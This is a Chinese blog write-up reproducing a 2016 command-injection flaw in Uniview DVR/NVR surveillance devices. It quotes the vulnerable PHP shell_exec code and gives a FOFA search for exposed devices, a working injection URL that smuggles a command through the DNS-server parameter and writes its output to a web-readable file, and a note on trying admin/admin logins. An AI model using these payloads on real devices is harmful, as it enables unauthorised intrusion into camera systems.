浙江宇视科技安防(DVR/NVR)等监控设备命令执行漏洞复现

声明

本文内容仅供学习交流使用,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。


 一、漏洞概述 

此漏洞于2016年3月份提交,算是比较久远的一个漏洞,但通过FOFA语句查询,还是可以找到对应的设备验证漏洞存在。

FOFA Dork:title=="ISC2500-S"

二、影响设备型号

ECR3316_HF ECR3316-HF ECR3308_HF ECR3308-HF ISC3500E ISC3500E ISC3500S ISC3500S ECR3316_HF_E ECR3316-HF-E ECR3308_HF_E ECR3308-HF-E ECR3316_HF_S ECR3316-HF-S ECR3308_HF_S ECR3308-HF-S ISC3500_ET ISC3500-ET ISC3500_EL ISC3500-EL ISC3500_ST ISC3500-ST ISC3500_SL ISC3500-SL ECR2104_HF ECR2104-HF ECR2108_HF ECR2108-HF ISC2500_SP ISC2500-SP ISC2500_EP ISC2500-EP ISC2500_E ISC2500-E ISC2500_S ISC2500-S ISC2500_L ISC2500-L ECR3308_HF_SC ECR3308-HF-SC ECR3316_HF_SC ECR3316-HF-SC ISC3500_LC ISC3500-LC ISC3500_SC ISC3500-SC ISC3500_EC ISC3500-EC ISC5000-E

三、白盒分析

在文件 /Interface/DevManage/VM.php 中:

..............代码省略....................

    // 设置DNS解析服务器地址

    case 'setDNSServer' :

        shell_exec('echo "nameserver '.$_REQUEST['DNSServerAdrr'].'"'.' > /etc/resolv.conf');

        $result['Code'] = 0;

        getTip($result);

        echo json_encode($result);

        break;

    default :

        showErrorRequest();

        break;

...........................代码省略.....................

四、EXP

/Interface/DevManage/VM.php?cmd=setDNSServer&DNSServerAdrr=" | whoami >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/11.php %23"

五、后续思考

因考虑到可能会存在Web端弱口令漏洞,打算尝试暴力破解。

 手动输入admin/admin,点击登录无反应。按照提示需要下载控件才可以使用,但经测试,这些设备因长期暴露在外网,且该漏洞时间已久,控件中包含WannaMine挖矿病毒,请谨慎下载。

六、修复意见

联系厂商,升级应用的版本。厂商链接:https://cn.uniview.com/

七、参考文献

https://www.seebug.org/vuldb/ssvid-91938

posted @ 2020-12-02 22:28  Charon·1937  阅读(3247)  评论(0编辑  收藏  举报
2 3
4